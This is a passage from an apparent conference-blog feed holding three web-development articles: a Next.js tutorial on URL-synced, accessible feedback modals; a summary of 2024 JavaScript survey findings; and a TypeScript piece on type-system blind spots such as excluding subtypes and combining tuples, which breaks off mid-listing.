Building a feedback modal in Next.js with TailwindCSS

Step 1: Setting up the /feedback route

The /feedback route serves as the main feedback page. TailwindCSS is used to style the form and layout.

Listing 4:

// app/feedback/page.tsx
export default function FeedbackPage() {
  return (
    <main className="flex flex-col items-center justify-center min-h-screen bg-gray-100">
      <h1 className="text-2xl font-bold text-gray-800">Feedback</h1>
      <p className="text-gray-600">We’d love to hear your thoughts!</p>
      <form className="mt-4 flex flex-col gap-4 w-full max-w-md">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </main>
  );
}

Step 2: Define the @modal slot

The @modal slot ensures that no modal is rendered unless explicitly triggered.

Listing 5:

// app/@modal/default.tsx
export default function Default() {
  return null; // Ensures the modal is not active by default
}


Step 3: Implement the modal in the /(.)feedback folder

This step uses the intercepting route pattern (.) to render the modal in the @modal slot.

Listing 6:

// app/@modal/(.)feedback/page.tsx
import { Modal } from '@/components/modal';

export default function FeedbackModal() {
  return (
    <Modal>
      <h2 className="text-lg font-bold text-gray-800">Give Feedback</h2>
      <form className="mt-4 flex flex-col gap-4">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </Modal>
  );
}

Step 4: Create the reusable modal component

The modal is styled using TailwindCSS for a modern and accessible design.

Listing 7:

// components/modal.tsx
'use client';

import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();

  return (
    <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Step 5: Update the layout for parallel routing

In the layout, the @modal slot is rendered next to the primary children.

Listing 8:

// app/layout.tsx
import Link from 'next/link';
import './globals.css';

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body className="bg-gray-100 text-gray-900">
        <nav className="bg-gray-800 p-4 text-white">
          <Link
            href="/feedback"
            className="hover:underline text-white"
          >
            Give Feedback
          </Link>
        </nav>
        <div>{modal}</div>
        <main className="p-4">{children}</main>
      </body>
    </html>
  );
}

You can find the complete implementation using TailwindCSS, including accessibility enhancements, on my GitHub repository.

Advanced features and enhancements

Accessibility improvements

Accessibility is critical when creating modals. Without proper implementation, modals can confuse users, especially those who rely on screen readers or keyboard navigation. Here are some key practices to ensure that your modal is accessible:

Focus management

When a modal is opened, the focus should be moved to the first interactive element within the modal, and users should not be able to interact with elements outside the modal. In addition, when the modal is closed, the focus should return to the element that triggered it.

This can be achieved by using JavaScript to trap focus within the modal:

Listing 9:

// Updated Modal Component with Focus Management
'use client';

import { useEffect, useRef } from 'react';
import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();
  const modalRef = useRef<HTMLDivElement>(null);

  useEffect(() => {
    const focusableElements = modalRef.current?.querySelectorAll(
      'button, [href], input, textarea, select, [tabindex]:not([tabindex="-1"])'
    );
    const firstElement = focusableElements?.[0] as HTMLElement;
    const lastElement = focusableElements?.[focusableElements.length - 1] as HTMLElement;

    // Trap focus within the modal
    function handleTab(e: KeyboardEvent) {
      if (!focusableElements || focusableElements.length === 0) return;

      if (e.key === 'Tab') {
        if (e.shiftKey && document.activeElement === firstElement) {
          e.preventDefault();
          lastElement?.focus();
        } else if (!e.shiftKey && document.activeElement === lastElement) {
          e.preventDefault();
          firstElement?.focus();
        }
      }
    }

    // Set initial focus to the first interactive element
    firstElement?.focus();

    window.addEventListener('keydown', handleTab);
    return () => window.removeEventListener('keydown', handleTab);
  }, []);

  return (
    <div
      ref={modalRef}
      role="dialog"
      aria-modal="true"
      className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50"
    >
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Focus trapping is essential for maintaining a seamless and accessible user experience when working with modals. It ensures that users cannot accidentally navigate or interact with elements outside the modal while it is open, preventing confusion and unintended actions. Additionally, returning focus to the element that triggered the modal provides a smooth transition when the modal is closed, helping users reorient themselves and continue interacting with the application without disruption. These practices enhance both usability and accessibility, creating a more polished and user-friendly interface.
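
In the same spirit, many teams also close the modal when the user presses Escape. A hypothetical addition that could sit next to the focus-trap logic inside the Modal component from Listing 9:

// Hypothetical addition inside the Modal component: close on Escape
useEffect(() => {
  function handleEscape(e: KeyboardEvent) {
    if (e.key === 'Escape') router.back();
  }
  window.addEventListener('keydown', handleEscape);
  return () => window.removeEventListener('keydown', handleEscape);
}, [router]);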

ARIA attributes

Using semantic HTML and ARIA attributes ensures that screen readers understand the structure and purpose of the modal.

  • Add role="dialog" to the modal container to define it as a dialog window.
  • Use aria-modal="true" to indicate that interaction with elements outside the modal is restricted.

Why this is important:
ARIA attributes provide assistive technologies such as screen readers with the necessary context to communicate the purpose of the modal to the user. This ensures a consistent and inclusive user experience.

Error handling and edge cases

Handling edge cases ensures that your modal behaves predictably in all scenarios. Here are some considerations:

Handle Refreshes

Since the modal state is tied to the URL, refreshing the page should display the appropriate content. In Next.js, this happens naturally due to the server-rendered /feedback route and the modal implementation.

Close modal on invalid routes

If the user navigates to an invalid route, the modal should close or render nothing. A catch-all route ([...catchAll]) in the @modal slot ensures this:

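// Hypothetical location: app/@modal/[...catchAll]/page.tsx (the @modal slot described above)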
export default function CatchAll() {
  return null; // Ensures the modal slot is empty
}

Smooth navigation

Ensure that navigating to another part of the application closes the modal. Using router.back() in the modal close button ensures that the user is returned to the previous route.

Listing 10:

<button
  onClick={() => router.back()}
  aria-label="Close"
  className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
>
  ✖
</button>

Why it matters:

Graceful navigation plays a key role in providing a consistent and predictable user experience, even when users interact with modals in unexpected ways. By ensuring that modal behaviour aligns with navigation actions, such as using the back or forward buttons, users can move through the application naturally without encountering inconsistencies.

Catch-all routes further enhance robustness by preventing unnecessary or unintended content from being rendered in the modal slot. They act as a safeguard, ensuring that only valid routes display content, while invalid or undefined routes leave the modal slot empty. Together, these strategies create a more reliable and user-friendly application.


Comparison and use cases

Comparison: URL-synced modals vs. traditional client-side modals

When building modals, developers often rely on client-side state management to control their visibility. While this approach is straightforward, it has several limitations compared to URL-synced modals in Next.js:

Feature | Client-side modals | URL-synced modals in Next.js
Deep Linking | Not supported. Users can’t share or bookmark the modal state. | Fully supported. Modal states are linked to specific URLs.
Refresh Behaviour | When the page is refreshed, the modal state is reset and closed. | The modal state persists across refreshes.
Navigation Consistency | Backwards or forward navigation cannot close or reopen the modal. | Modals respect browser navigation, closing or reopening correctly.
Scalability | State management for complex modals can be difficult in large applications. | Simplified state management using URL routes.
SEO and Accessibility | Modals are not indexed or accessible via URLs. | Can be indexed and shared where appropriate.

Why URL-synchronised modals are important:

These features significantly enhance the user experience by enabling deep linking, allowing users to share and bookmark specific modal states with ease. Navigation consistency ensures that actions like using the back or forward buttons behave as expected, seamlessly opening or closing modals without disrupting the flow of the application. For developers, Next.js simplifies state management by leveraging its routing mechanisms, eliminating the need for complex custom logic to control modal behaviour. This combination of improved usability and reduced development complexity makes Next.js an ideal framework for building modern, shareable modals.

Practical use cases for URL-synced modals

Next.js makes URL-synced modals versatile and scalable. Here are a few common use cases:

Feedback forms

As this article shows, feedback forms are ideal for modals. Users can easily share a link to the form (/feedback), and the form remains accessible even after a page refresh.

Photo galleries with previews

Imagine a gallery where users can click on a thumbnail to open a photo preview in a modal. With URL-synchronised modals:

  • Clicking on a photo updates the URL (e.g. /gallery/photo/123).
  • Users can share the link, allowing others to view the photo directly.
  • Navigating backwards or forwards closes or reopens the modal.

Shopping Cart and Side Panels

E-commerce applications often use modals for shopping carts. With URL-synced modals:

  • The cart can be linked to a route such as /cart.
  • Users can share their cart link with preloaded items.
  • Refreshing the page keeps the cart open, preventing it from losing its state.

Authentication and login

For applications that require authentication, login forms can be presented as modals. A user clicking “Login” could open a modal linked to “/login.” When the modal is closed or the user navigates elsewhere, the state remains predictable.

Notifications and Wizards

  • Notifications: Display announcements or updates in a modal tied to a route, such as /announcement.
  • Onboarding Wizards: Guide users through a multistep onboarding process, with each step linked to a unique URL (e.g. /onboarding/step-1).

When to avoid URL-synced modals

Although URL-synced modals are powerful, they are not appropriate for every scenario. Consider avoiding them in the following cases:

  • Highly transient states: Modals used for brief interactions (such as confirming a delete action) may not require URL updates.
  • Sensitive data: If the modal contains sensitive information, ensure that deep linking and sharing are restricted.
  • Non-navigable workflows: If the modal does not require navigation controls (e.g. forward/backwards), simpler client-side modals may be sufficient.

With these comparisons and use cases, developers can make informed decisions about when and how to implement URL-synced modals in their Next.js projects.


Conclusion

URL-synchronised modals in Next.js provide a modern solution to the common challenges developers face when implementing modals in web applications. By leveraging features such as intercepting and parallel routes, Next.js enables deep linking, navigation consistency, and improved user experience – all while simplifying state management.

Key Takeaways

  1. Improved user experience:
    URL-synchronised modals allow users to share, bookmark, and revisit specific modal states without breaking functionality. They also respect browser navigation, ensuring that modals open and close as expected.
  2. Simplified state management:
    By tying modal states to the URL, developers can avoid the complexity of managing client-side state for modals in large applications.
  3. Broad applicability:
    From feedback forms and photo galleries to shopping carts and onboarding wizards, URL-synced modals provide a scalable and reusable solution for multiple use cases.

Recommendations:

  • Use Next.js’ intercepting and parallel routes to create modals that integrate seamlessly into your application.
  • Focus on accessibility by implementing ARIA roles, focus trapping, and logical navigation.
  • Evaluate whether URL-synced modals are appropriate for your specific use case, especially when dealing with transient or sensitive data.

For a complete example of building a feedback modal with URL-synced functionality in Next.js, check out my GitHub repository.

If you’re ready to take your Next.js projects to the next level, try implementing URL-synced modals today. They are not only user-friendly but also developer-friendly, making them a great addition to any modern web application.

 

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
The 2024 State of JavaScript Survey: Who’s Taking the Lead? https://javascript-conference.com/blog/state-of-javascript-ecosystem-2024/ Wed, 05 Feb 2025 10:48:23 +0000 https://javascript-conference.com/?p=107421 Dominating frontend development, JavaScript continues to be one of the most widely used programming languages and the cornerstone of web development. As we step into 2025, we’ll take a closer look at the state of JavaScript in 2024, highlighting the major trends and the most popular frameworks so you can stay ahead of the curve.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
The State of Developer Ecosystem Report 2024 by JetBrains gives a snapshot of the developer world, based on insights from 23,262 developers worldwide. The survey shows that JavaScript remains the most-used programming language globally, with 61% of developers using it to build web pages.


Figure 1: Which programming languages have you used in the last 12 months? (source: JetBrains)

Key Takeaways

  • Demographically, the U.S. represented a large share of respondents with 15%, followed by Germany at 8%, France at 7%, and Spain and the United Kingdom at 4% each.
  • The average age of survey respondents was 33.5 years. Age and income were positively correlated, and younger respondents showed more gender diversity, suggesting changing demographics.
  • 51% of participants had 10 years or less of experience, while 33% had between 10 and 20 years of experience.
  • 95% of respondents used JavaScript in a professional capacity, and 40% used it as a hobby in 2024, up from 91% and 37% in 2023.
  • 98% reported using JavaScript for frontend development and 64% for backend. Additionally, 26% used it for mobile apps and 18% for desktop apps.

Figure 2: JavaScript use case (source: State of JS)

 

The most common application patterns remain the classic ones: Single-Page Apps (90%) and Server-Side Rendering (59%). Static Site Generation came in third position with 46%.

The survey also looked at AI usage to generate code. 20% of respondents said they never use it for coding, while 7% reported using it about half the time.


TypeScript vs. JavaScript

TypeScript has seen impressive growth, as its adoption has risen from 12% in 2017 to 35% in 2024, according to JetBrains’ report. 67% of respondents reported writing more TypeScript than JavaScript code, and the largest group consists of people who only write TypeScript.

Figure 3: TypeScript usage (source: State of JS)

 

TypeScript’s popularity is due to its enhanced features to write better JavaScript code. It detects errors early during development, improves code quality, and makes long-term maintenance easier, which is a huge plus for developers. However, TypeScript isn’t here to replace JavaScript. They’ll just coexist, giving developers more options based on what they need and prefer.

Libraries and Frameworks

Webpack is the most used JavaScript tool, as 85.3% of respondents reported using it. However, Vite takes the lead for the most loved, earning 56% of positive feedback. Despite being relatively new, Vite is also the third most used tool with 78.1% adoption.

React came in second for both most used (81.1%) and most loved (46.7%). 

Angular, on the other hand, ranked eighth with 50.1% usage and 23.3% positive feedback, falling behind tools like Jest, Next.js, Storybook, and Vue.js.


Figure 4: Libraries experience grouped by usage (source: State of JS)

Figure 5: Libraries experience grouped by sentiment (source: State of JS)

The survey also highlights usage trends of frontend frameworks over time. While React remains in the top spot, Vue.js continues to overtake Angular, holding on to its position as the second most used framework.

React keeps reinventing itself, transitioning from being just a library to evolving into a specification for frameworks. With the release of version 19 in December, it introduced support for web components along with new hooks and form actions that redefine how forms are handled in React. 

Vue.js’ popularity can be attributed to its flexible, comprehensive, and advanced features, which appeal to both beginners and experienced developers. Daniel Roe from the Nuxt core team credits the ecosystem’s growth to its UI libraries, with Tailwind CSS playing a key role. Its convention-based approach and cross-framework compatibility make it easier to port libraries like Radix Vue from their React counterparts. 

Angular’s third-place ranking is still a good position, as many developers and companies continue to use it for its performance, safety, and scalability. Its ecosystem, TypeScript integration, and features like dependency injection still make it an attractive choice for web development.  

Svelte’s usage is also growing steadily, with developers showing increasing favor for it after it released version 5 in October. According to Best of JS, one of its major highlights is the introduction of “runes,” a new mechanism for declaring reactive state.

Figure 6: Frontend frameworks ratios over time (source: State of JS)


Challenges and Limitations  

When asked about their biggest struggle with JavaScript, 32% of respondents pointed to the lack of a built-in type system, far ahead of browser support issues, which only 8% mentioned.

Regarding browser APIs, poor browser support was the biggest issue for 35% of respondents. Safari and the lack of documentation on browser features also came up as common problems with 6% and 5% mentions, respectively.

React, as the most used frontend framework, was also the most criticized, with 14% of respondents complaining about having issues with it. Common issues related to frameworks included excessive complexity, poor performance, choice overload, and breaking changes.

It’s exciting to see how the JavaScript ecosystem will develop in 2025, unlocking new possibilities for web development. The growing use of TypeScript will solidify as a standard for large-scale applications due to its type safety and improved developer tooling. We’ll also see the rise of server-side rendering (SSR) frameworks like Next.js and Nuxt.js, enhancing both performance and SEO. Additionally, React and Angular will continue to push forward with updates focused on optimizing the developer experience and simplifying app development. If you’re interested in diving deeper into these topics, make sure to check out our conference program for more insights and expert-led sessions!

If you want to get more details, check the JavaScript Survey page.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
TypeScript’s Limitations and Workarounds https://javascript-conference.com/blog/typescript-limitations-workarounds/ Mon, 16 Dec 2024 14:20:26 +0000 https://javascript-conference.com/?p=107028 TypeScript, while a powerful programming language, has limitations that arise from its type system's attempt to manage dynamically typed JavaScript code. From handling return types and function expressions to the behavior of else statements, developers often encounter challenges when working with TypeScript files. Issues can emerge at compile time, especially when using generic functions, creating an instance, or managing type information. This article explores the blind spots in TypeScript, such as handling function objects, top-level constructs, and dynamically typed scenarios, offering insights into workarounds and practical solutions.

The post TypeScript’s Limitations and Workarounds appeared first on International JavaScript Conference.

]]>
TypeScript’s type system effectively manages much of JavaScript’s dynamism in useful ways, rather than eliminating it. Developers writing TypeScript code can use almost the full range of web technologies in a type-safe manner. However, when issues arise, they’re often the result of the developer’s choices, not the tools themselves.

Most developers follow well-established patterns in their day-to-day programming. Modern frameworks and tools provide solid structures to guide us, offering solutions and guidelines for nearly every question. However, the complexity and long history of the modern web platform ensure that surprises still occur and new, sometimes unsolvable, challenges continue to emerge.

This issue extends beyond people to include their tools and machines. No one can do everything, and certainly, not every tool is suited to every task. TypeScript is no exception: while it can accurately describe 99% of JavaScript features, one percent remains beyond its grasp. This gap doesn’t only consist of reprehensible anti-features. Some JavaScript features that TypeScript doesn’t fully understand can still be useful. Additionally, for some other features, TypeScript operates under assumptions that can’t always align with reality.

Like any tool, TypeScript isn’t perfect; and we should be aware of its blind spots. This article addresses three of these blind spots, offers possible workarounds, and explores the implications of encountering them in our code.

Blind Spot 1: Excluding subtypes in type parameters

The Liskov substitution principle requires that a program can handle subtypes of T wherever a type T is expected. The classic example of object orientation still serves as the best illustration of this principle (Listing 1).

Listing 1: The classic OOP example with animals

class Dog {
  name: string;
  constructor(name: string) {
    this.name = name;
  }
}

class Collie extends Dog {
  hair = "long";
}

let myDog: Dog = new Collie("Lassie");
// Works!

It makes perfect sense that a Collie instance is assigned to a variable of type Dog, because a Collie is a dog with long hair. The object that ends up in the myDog variable provides all the functions required by the Dog type annotation. The fact that the object can do more (for example, show off long hair) is irrelevant in this context. But what if that additional feature does matter?

Thanks to structural subtyping, TypeScript allows any object that fulfills a given API contract (or implements a given interface) to be treated as a “subtype” (Listing 2).

Listing 2: Structural subtyping in Action

class Dog {
  name: string;
  constructor(name: string) {
    this.name = name;
  }
}

type Cat = { name: string };

let myPet: Cat = new Dog("Lassie");
// Works!

In web development, where developers don’t have to manually create every object from a class constructor, this rule is very pragmatic. On one hand, it results in relatively minor semantic errors (Listing 3), but on the other, it can also lead to more significant pitfalls.

Listing 3: Structural subtyping triggers an error

type RGB = [number, number, number];
let green: RGB = [0, 100, 0];

type HSL = [number, number, number];
let red: HSL = [0, 100, 50];

red = green;
// Works! RGB and HSL have the same structure
// But is that OK at runtime?

Let’s look at a function that accepts a parameter of type WeakSet<any>:

function takesWeakSet(m: WeakSet<any>) {}

In JavaScript, weak sets are sets with special garbage collection features. They only hold weak references to their contents and can’t cause memory leaks. However, unlike normal sets, weak sets lack many features, mainly all iteration mechanisms. While normal sets can function as universal lists as well as sets, weak sets can only tell us whether they contain a given value, something normal sets can do too. This means that the WeakSet API is a subset of the Set API, meaning that Set is a subtype of WeakSet (Listing 4).

Listing 4: WeakSets and Sets as subtypes

function takesWeakSet(m: WeakSet<any>) {}

// Works obviously
takesWeakSet(new WeakSet());

// Works too, Set is a subtype of WeakSet
takesWeakSet(new Set());

// But is that OK at runtime?

Depending on the function’s intent, this can either be a non-issue (as with Dog and Collie), an easily identifiable problem (as with RGB and HSL), or it can lead to subtle, undesired behavior in our program. When takesWeakSet() expects to receive a true WeakSet, it might store new values in the set and assume that it doesn’t need to worry about removing them later. After all, weak sets automatically prevent memory leaks. However, this assumption can be undermined if Set is considered a subtype of WeakSet.
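
A hypothetical illustration of this mismatch (the function and variable names are made up):

function remember(seen: WeakSet<object>, value: object) {
  // The function assumes a real WeakSet: entries never keep objects alive
  seen.add(value);
}

const cache = new Set<object>(); // structurally assignable to WeakSet<object>
remember(cache, { payload: new Array(1_000_000).fill(0) });
// The Set holds a strong reference, so the large object can never be
// garbage collected – the "weak" assumption silently breaks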

So, while it’s often safe to accept subtypes of a given type, it’s not always so straightforward. In this case, the implementation is relatively simple, but it’s not possible to generalize this approach.


Unfortunately, subtypes have to stay out

With type-level programming, it’s comparatively easy to construct a type that accepts another type but rejects its subtypes. The key tool for this is generic types, which we can consider to be type functions (Listing 5).

Listing 5: Generic Types as Type Functions

// Type function that wraps the parameter T
// in an array
type Wrap<T> = [T];

// Corresponding JS function that
// wraps the parameter t in an array
let wrap = (t) => [t];

In generic types, we can use conditional types, which work just like the ternary operator in JavaScript (Listing 6).

Listing 6: Conditional Types

// A extends B = "is A assignable to B?"
// In other words: "is A a subtype of B?"
type Test<T> = T extends number ? true : false;

type A = Test<42>; // true (42 is assignable to number)
type B = Test<[]>; // false ([] is not assignable to number)

Equipped with this knowledge, we can now formulate a type function that accepts two type parameters and determines whether the first parameter exactly matches the type of the second parameter. This is true only if the first parameter is assignable to the second and the second parameter is assignable to the first. If either of these conditions doesn’t apply, then either the first parameter must be a subtype of the second, the second must be a subtype of the first, or both parameters must be completely incompatible. In code, this is illustrated in Listing 7.

Listing 7: ExactType<Type, Base>

type ExactType<Type, Base> =
  Type extends Base
    ? Base extends Type
      ? Type
      : never
    : never;

type A = ExactType<WeakSet<any>, WeakSet<any>>;
// Result: WeakSet<any> - A and B are the same

type B = ExactType<Set<any>, WeakSet<any>>;
// Result: never - A is a subtype of B

type C = ExactType<WeakSet<any>, Set<any>>;
// Result: never - B is a subtype of A

type D = ExactType<WeakSet<any>, string>;
// Result never - A and B are incompatible

The type never, used here to model the case where the type and base are different, is a type to which no value can be assigned. Each data type represents a set of possible values (e.g., number is the set of all numbers and Array<string> is the set of all arrays filled with strings), while never represents an empty set. No error, no exception: never simply stands for nothing.

We can now use ExactType<Type, Base> to modify takesWeakSet() so that it only accepts weak sets. We just have to make the function generic and then define the type for the value parameter m with ExactType (Listing 8).

Listing 8: ExactType<Type, Base> in action

type ExactType<Type, Base> =
  Type extends Base
    ? Base extends Type
      ? Type
      : never
    : never;

function takesWeakSet<T>(m: ExactType<T, WeakSet<any>>) {}

// Works obviously
takesWeakSet(new WeakSet());

// No longer works!
takesWeakSet(new Set());

The reason why the call with the normal set does not work is that ExactType<Type, Base> computes the type never as a result here, and since no value (and certainly no set object) fits into never, the TypeScript compiler complains at this point as desired. Problem solved?

The difficult subtype exclusion in type parameters

If we can treat generic types like functions, as we suggested earlier, then it should be possible to reproduce the features of the runtime function takesWeakSet() as a type function. As it stands now, the runtime function only accepts a parameter that is restricted to an exact type, so the same should be achievable at the type level. The skeleton, a generic type with a type parameter, is easy to set up:

type TakesWeakSet<M> = {}; 

Since any arbitrary data type could be used here, we need a constraint for the type parameter M. Fortunately, this isn’t a problem, as extends clauses can be used both in conditional types and as constraints for type parameters:

type TakesWeakSet<M extends WeakSet<any>> = {}; 

This puts the type function in the same state that takesWeakSet() was in initially: it’s a single-argument function with a type annotation that specifies a minimal requirement for the input. Subtypes are still accepted (Listing 9).

Listing 9: Subtypes as Input

type TakesWeakSet<M extends WeakSet<any>> = {};

// Obviously works
type A = TakesWeakSet<WeakSet<any>>;

// Also works, Set is a subtype of WeakSet
type B = TakesWeakSet<Set<any>>;

That’s not a problem, as that’s exactly why we wrote ExactType. However, there is a fundamental difference between the type function TakesWeakSet<M> and the runtime function takesWeakSet(m). The latter, if we look closely, has one more parameter than the former (Listing 10).

Listing 10: Type and runtime function in comparison

// One parameter “M”
type TakesWeakSet<M extends WeakSet<any>> = {};

// One parameter “m” AND one type parameter T
function takesWeakSet<T>(m: ExactType<T, WeakSet<any>>) {}

A call to the runtime function takesWeakSet() passes two parameters: a type parameter and a value parameter. The type parameter is used to calculate the type of the value parameter, where an error occurs if ExactType returns never. The type function ExactType is key to excluding subtypes. This trick can’t be reproduced at the type level because self-referential type parameters aren’t allowed, except in a few special cases that aren’t relevant here (Listing 11).

Listing 11: No self-referential constraints in type parameters

// Error: “Type” cannot be input for
// its own constraints
type TakesExact<Type extends ExactType<
  Type,
  WeakSet<any>>
> = {};

What would work, however, is to move the logic from ExactType to TakesExact. This wouldn’t reject subtypes, but would instead translate them to never, resulting in no error, just a likely unhelpful result (Listing 12).

Listing 12: TakesExact with the logic of ExactType

type TakesExact<Type> = Type extends WeakSet<any>
  ? WeakSet<any> extends Type
    ? Type
    : never
  : never;

type R1 = TakesExact<WeakSet<{}>>;
// OK, R1 = WeakSet<{}>

type R2 = TakesExact<Set<string>>;
// OK, R2 = never (NO error)

type R3 = TakesExact<Array<string>>;
// OK, R3 = never (NO error)
 

Regardless of how you approach it, rejecting parameters that are subtypes of a given type or enforcing an exact type at the type level isn’t possible. TypeScript has a blind spot here. But is this truly a problem?

How do we deal with subtype constraints at the type level?

The golden rule of programming in statically typed languages is: “Make invalid states unrepresentable.” If developers can write code in such a way that it prevents the program from taking wrong paths (e.g., by using exact type annotations to eliminate invalid inputs), they can save a lot of time debugging unwanted states. In principle, this rule is invaluable and should be followed whenever possible. However, it isn’t always feasible in the unpredictable world of JavaScript and TypeScript development.

To summarize, our goal was to create a program where a variable of type T can only be assigned values of type T and not any of its subtypes. We’ve succeeded in doing this in the runtime code, but we’ve failed at the type programming level. However, according to the Liskov substitution principle, this restriction may be unnecessary. After all, a subtype of T inherently has all the functions of T, so why do we need the restriction in the first place?

In our case, the key factor is that a Set and a WeakSet have very different semantics, even though the WeakSet API is a subset of the API of Set. In TypeScript’s type system, this means that Set is evaluated as a subtype of WeakSet, leading to the assumption of a relationship and substitutability where none exists. This blind spot in the type system leads us to solve a problem that isn’t actually a problem at all, and which we ultimately can’t resolve, especially at the type level.

Instead, we have to accept that the TypeScript type system doesn’t correctly model every detail of JavaScript objects and their relationships. Structural subtyping is a very pragmatic approach for a type system that attempts to describe JavaScript, but it’s not particularly selective. If we find ourselves in a situation where we want to ban subtypes from certain program parts despite TypeScript’s resistance, we should ask ourselves two questions:

  1. Do we really need to exclude subtypes, or would the program work with subtypes? Can we rewrite the program to work with subtypes like any other program?
  2. Are we trying to exclude subtypes to compensate for blind spots in the TypeScript type system (as in the Set/WeakSet example)?

For the second case, the solution is simple: don’t use the type system for this task. Trying to exclude subtypes is essentially working against what TypeScript is designed to do (a type system based on structural subtyping) and attempting to compensate for a limitation within TypeScript itself. A more pragmatic approach would be to simply defer the distinction between two types that TypeScript has assessed incorrectly to the runtime. In the case of Set and WeakSet, this is particularly trivial because JavaScript knows that these two objects are unrelated (Listing 13).

Listing 13: Runtime distinction between Set and WeakSet

new WeakSet() instanceof WeakSet
// > true

new Set() instanceof WeakSet
// > false

“Make invalid states unrepresentable” is still a valuable guideline. However, in TypeScript, we sometimes need to use methods other than the type system to implement this, because the type system can’t accurately model every relationship between JavaScript objects. The type system only looks at the API surfaces of objects, and sometimes seemingly related surfaces hide entirely different semantics. In such cases, we shouldn’t use the type system to solve the problem but rather use a more appropriate solution.
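As a rough illustration of what such a runtime solution could look like (this sketch is not from the original article; the error message and the exact signature are my own choices), an instanceof check inside the function does what the type system cannot:

// A minimal sketch: enforce "exactly a WeakSet" at runtime
// instead of fighting the structural type system.
function takesWeakSet(m: WeakSet<any>) {
  if (!(m instanceof WeakSet)) {
    throw new TypeError("Expected a real WeakSet");
  }
  // ... work with m ...
}

takesWeakSet(new WeakSet()); // OK
takesWeakSet(new Set());     // compiles, but throws at runtime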

Blind Spot 2: Non-Modelable Intermediate States

Combining an object from a list of keys and a parallel list of values of the same length is trivial in JavaScript, as we see in Listing 14.

Listing 14: JS function combines two lists into one object

function combine(keys, vals) {
  let obj = {};
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

let res = combine(["foo", "bar"], [1337, 9001]);

// res = { foo: 1337, bar: 9001 }

Imperative programming doesn’t get any easier than this: you take a bunch of variables and manipulate them until the program reaches the desired target state. But as we all know, this programming style can be error-prone. Every for loop is an off-by-one error waiting to happen. So it makes sense to secure this code snippet as thoroughly as possible with TypeScript.

First, we need to ensure that keys and values are tuples (i.e. lists of finite length). The content of keys should be restricted to valid object key data types, while values can contain any values, but must have the exact same length as keys. This isn’t particularly difficult: we can constrain the type variable K for keys to be a tuple with matching content, and then use K as a template to create a tuple of the same length full of any, which is exactly the appropriate restriction for values (Listing 15).

Listing 15: Function signature restricted to two tuples of equal length

type AnyTuple<Template extends any[]> = {
  [I in keyof Template]: any;
};

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  // ... Rest ...
}

With a type K of all keys and a type V of all values, we can then construct an object type that describes the result of the combine() operation. This is a bit complex, but we can manage. First, we need the auxiliary type UnionToIntersection<T>, which, as the name suggests, turns the members of a union T into an intersection type. The syntax looks a bit weird, and the underlying mechanics of distributive conditional types are equally strange. Overall, I prefer not to dive into the details right now. The key takeaway is that UnionToIntersection<T> turns a union into an intersection (Listing 16).

Listing 16: UnionToIntersection<T>

type UnionToIntersection<T> =
  (T extends any ? (x: T) => any : never) extends
  (x: infer R) => any ? R : never;

type Test = UnionToIntersection<{ x: number } | { y: string }>;
// Test = { x: number } & { y: string }
 

With this tool, we can now model a type that, similar to the combine() function, combines two tuples into one object, if we can think creatively. Step 1 is to write a generic type that accepts the same type parameters as combine() (Listing 17).

Listing 17: Type Combine<K, V>

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {};

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = {}

Step 2: A new tuple is temporarily created with a mapped type that has the same number of positions as K and V (Listing 18).

Listing 18: Two tuples become one tuple

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: any;
}

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = [any, any]

At first glance, this maneuver seems to distract us from our actual goal, as we want to turn tuples into an object, not just another tuple. However, to do this, we need access to the indices of the input tuples, which is achieved here by the type variable Index. This allows us to replace any on the right side of the mapped type with an object type that models a name-value pair of our target object (Listing 19).

Listing 19: Two tuples become one tuple of objects

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
};

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = [{ foo: 1337 }, { bar: 9001 }]

Now we get a tuple that at least contains all the building blocks of our target object. To unpack it, we index the tuple with number, which leads us to a union of the tuple contents (Listing 20). We can then combine this union into an object type using UnionToIntersection<T> (Listing 21). Mission accomplished!

Listing 20: Two tuples become a union of objects

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
